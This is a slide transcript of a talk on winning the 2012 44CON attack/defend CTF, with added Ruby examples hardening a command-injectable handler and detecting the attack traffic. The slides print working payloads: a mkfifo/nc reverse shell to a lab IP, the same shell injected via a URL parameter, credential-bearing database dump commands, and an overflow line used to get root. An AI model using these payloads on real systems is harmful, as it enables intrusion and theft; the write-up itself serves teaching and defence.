
Playing the 44CON CTF for fun and profit

44CON
November 21, 2012

Rundown of what it took to win the MWRLabs 44CON CTF in 2012 by the winning team 'Three Headed Monkeys'

Transcript

  1. Me
     - Software developer
     - Trying not to make things worse
     - Know a lot about bugs
     - CTF team 0xbadf00d
     - Contributor to io.smashthestack.org
  2. CTF
     - "It's kind of like a Computer Science exam on acid"*
     - Solving technical security challenges to get points.
     - * CSAW CTF "About" page
  3. CTF Types
     - Challenge-based: DEF CON quals, Ghost In The Shellcode, CSAW CTF
     - Attack/defend: DEF CON finals, 44Con CTF (this year)
  4. 44CON CTF - What we got
     - Virtual Machine image
     - IP Address
     - Scope of "attackable" machines
  5. Attack & Defend
     - Kind of like a pentest (maybe, I've never done a pentest)
     - I have a plan: Recon, Harden, Write exploits, Run riot, Get the girl, Save the world
  6. Step 1 - Recon
     - I'd rather be offline than owned
     - Self-recon
     - Capture traffic
     - Quick nmap of non-player servers
  7. Recon - Scoring
     - Regular "scoring rounds"
     - Score server stores new keys in services
     - Score server checks for previous keys?
     - Every 30 minutes
     - Not great if you're trying to see talks!
  8. Pastie
     - Written in PHP
     - Pastes stored in a MySQL database
     - Recon shows keys are stored as pastes
     - PHP+MySQL - can you tell what the vuln is yet?
  9. Pastie exploit
     - I want keys!
     - Had a look at my own DB to figure out the query
  10. Mailserver
      - SMTP and POP3 server
      - Keys are stored in emails
      - Written in Ruby
      - I don't know Ruby
      - ~500 lines
  11. Auth - exploitation
      - Classic stack buffer overflow
      - Overwrite return address with value of my choice
      - Remote code execution..... ....right?
  12. Auth - exploitation
      - Just put a valid writable address in the buffer ptr!
      - Easy if this was a 32bit process.
      - Our memory space is annoying.
  13. Auth - exploitation
      gdb$ info proc map
      Mapped address spaces:
          Start Addr          End Addr            Size     Offset  objfile
          0x400000            0x403000            0x3000   0x0     /services/auth/auth
          0x602000            0x603000            0x1000   0x2000  /services/auth/auth
          0x603000            0x604000            0x1000   0x3000  /services/auth/auth
          0x604000            0x625000            0x21000  0x0     [heap]
          ........            ........            .......  ...     ......
          0x7ffffffde000      0x7ffffffff000      0x21000  0x0     [stack]
          0xffffffffff600000  0xffffffffff601000  0x1000   0x0     [vsyscall]
  14. Auth - exploitation
      gdb$ info proc map
      Mapped address spaces:
          Start Addr          End Addr            Size     Offset  objfile
          0x0000000000400000  0x0000000000403000  0x3000   0x0     /services/auth/auth
          0x0000000000602000  0x0000000000603000  0x1000   0x2000  /services/auth/auth
          0x0000000000603000  0x0000000000604000  0x1000   0x3000  /services/auth/auth
          0x0000000000604000  0x0000000000625000  0x21000  0x0     [heap]
          ........            ........            .......  ...     ......
          0x00007ffffffde000  0x00007ffffffff000  0x21000  0x0     [stack]
          0xffffffffff600000  0xffffffffff601000  0x1000   0x0     [vsyscall]
      (read-only)
  15. Auth - exploitation
      - Time's up! No remote code execution :-(
      - Very limited DoS
      - Crash process
      - Restarts automatically
  16. Servicemon - exploitation
      - Never mind keys, I want a shell
      contestant@ubuntu:~$ nc -l 31337 -e /bin/sh
      nc: invalid option -- 'e'
  17. Servicemon - exploitation
      rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.75 31337 >/tmp/f
      *cracks knuckles*
      http://ip:3000/hash?filelist=notafile||rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202>%261%7Cnc%20192.168.1.75%2031337%20>%2Ftmp%2Ff
  18. Servicemon - exploitation
      contestant@ubuntu:~$ nc -lv 31337
      Connection from 192.168.1.72 port 31337 [tcp/*] accepted
      $ whoami
      contestant
      $ pwd
      /services/servicemon
      Now we can have some fun!
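The servicemon bug above is an OS command injection: a query parameter is handed to a shell, so `||` and `;` in it become extra commands. The example below is added here and is not the CTF service's code (its source is not on the slides); it shows the assumed unsafe shape of such a `/hash?filelist=` handler next to a hardened version that never spawns a shell, validates each name against an allowlist, and confines it to a base directory. The `md5sum` command, the function names and the sample directory are all constructed for illustration.

```ruby
# Added example, not the 44CON servicemon code: a hypothetical reconstruction
# of an injectable /hash handler beside a hardened one.
require "digest"
require "tmpdir"

# Hypothetical unsafe pattern (assumed, not taken from the service): the raw
# query parameter is spliced into a shell command line. Returned as a string
# instead of executed, so the reader can see exactly what a shell would parse.
def unsafe_command_line(filelist)
  "md5sum #{filelist}"
end

# Hardened version: no shell at all. Each comma-separated entry must be a plain
# file name, must resolve inside base_dir, and is hashed in-process.
SAFE_NAME = /\A[A-Za-z0-9._-]+\z/

def safe_hashes(base_dir, filelist)
  base = File.expand_path(base_dir)
  filelist.split(",").map do |name|
    raise ArgumentError, "bad file name: #{name.inspect}" unless name.match?(SAFE_NAME)
    path = File.expand_path(name, base)
    # "." and ".." pass the regex but resolve outside base/, so reject them here
    raise ArgumentError, "outside base dir: #{name.inspect}" unless path.start_with?(base + File::SEPARATOR)
    raise ArgumentError, "no such file: #{name.inspect}" unless File.file?(path)
    [name, Digest::SHA256.file(path).hexdigest]
  end.to_h
end

# Constructed sample directory with two small files for demonstration.
def sample_dir
  dir = Dir.mktmpdir("servicemon-example")
  File.write(File.join(dir, "a.txt"), "hello\n")
  File.write(File.join(dir, "b.txt"), "world\n")
  dir
end

if __FILE__ == $PROGRAM_NAME
  dir = sample_dir
  p safe_hashes(dir, "a.txt,b.txt")
  # The injected value from slide 17 is rejected before anything runs.
  begin
    safe_hashes(dir, "notafile||rm /tmp/f")
  rescue ArgumentError => e
    puts "rejected: #{e.message}"
  end
  # What the unsafe handler would have handed to /bin/sh:
  puts unsafe_command_line("notafile||id")
end
```

The point of the hardened version is that the fix is not "escape the metacharacters" but "do not go through a shell, and do not accept arbitrary paths": with the hash computed in-process there is nothing left for `||` to chain onto.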
  19. Steal all the keys
      mysql --user=sinatra --password=44ConCTF servicemon -e "select status from statuses order by created_at desc limit 1;"
      mysql --user=pastie --password=J@cobsClub\$ paste -e "select pastie from pastie order by date desc limit 1;"
      OUTPUT=$(redis-cli -r 1 keys \* | tail -n 1)
      redis-cli -r 1 lrange $OUTPUT 0 1
  20. Escalation - the hard way
      USER  PID   TTY  STAT  COMMAND
      root  8680  ?    Ss    /services/auth/auth
  21. Escalation - the hard way
      - Next time auth respawns we will get a root shell
      - Lame DoS to the rescue!
      perl -e 'print "auth " . "A"x1100 . "\n"' | nc ip 23500
      Connection from 192.168.1.73 port 31337 [tcp/*] accepted
      # whoami
      root
  22. Escalation - the easy way
      220 Mail Service ready (33147)
      HELO
      250 Requested mail action okay, completed
      EXPN
      respond(client, `whoami`)
      root
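From the defending team's side, each of the three attacks in slides 17, 21 and 22 leaves a distinctive trace: a `/hash` request whose decoded `filelist` contains shell metacharacters, an `auth` line roughly 1100 bytes long where a username should be, and an `EXPN` command to a mail server that answers it by running a shell command. The detector below is an added example, not part of the slides or of the CTF services; the log line formats, the 256-byte login-line limit and the sample entries are all constructed assumptions, since the real services' logging is not shown.

```ruby
# Added example, not from the slides: a small detector run over constructed
# service logs for the traffic patterns shown on slides 17, 21 and 22.
require "uri"

SHELL_META = /[|;&`$<>]/   # characters a shell would interpret as operators
AUTH_MAX_LEN = 256         # assumed sane upper bound for one auth login line

# Constructed sample log; the format is an assumption made for this example.
SAMPLE_LOG = <<~LOG
  servicemon 192.168.1.73 "GET /hash?filelist=a.txt,b.txt HTTP/1.1" 200
  servicemon 192.168.1.73 "GET /hash?filelist=notafile||rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff HTTP/1.1" 200
  auth 192.168.1.73 recv "auth bob"
  auth 192.168.1.73 recv "auth #{"A" * 1100}"
  mail 192.168.1.73 cmd HELO
  mail 192.168.1.73 cmd EXPN
LOG

# Decode the query string of a request target into a hash. URI.parse is
# avoided on purpose: it rejects raw "|" characters, and the injected request
# on slide 17 contains exactly those.
def query_params(request_target)
  _path, query = request_target.split("?", 2)
  return {} unless query
  query.split("&").each_with_object({}) do |pair, h|
    k, v = pair.split("=", 2)
    h[URI.decode_www_form_component(k.to_s)] = URI.decode_www_form_component(v.to_s)
  end
rescue ArgumentError
  {} # malformed percent-encoding: nothing to decode
end

# Classify one log line; returns a symbol for a suspicious line, nil otherwise.
def classify(line)
  case line
  when /\Aservicemon \S+ "GET (\S+) HTTP/
    filelist = query_params($1)["filelist"]
    return :command_injection if filelist && (filelist.match?(SHELL_META) || filelist.include?("/"))
  when /\Aauth \S+ recv "([^"]*)"/
    return :oversized_auth_line if $1.length > AUTH_MAX_LEN
  when /\Amail \S+ cmd (EXPN|VRFY)\b/
    return :mail_expansion_probe
  end
  nil
end

# Run the classifier over a whole log, returning [reason, line] pairs.
def alerts(log)
  log.each_line.map { |l| (c = classify(l.chomp)) && [c, l.strip] }.compact
end

if __FILE__ == $PROGRAM_NAME
  alerts(SAMPLE_LOG).each { |reason, line| puts "#{reason}: #{line[0, 80]}" }
end
```

The oversized-line rule is the one that matters most for the root shell on slide 21: the crash itself is what the attacker wanted, so the signal to alert on is the input that caused it, not the restart that followed.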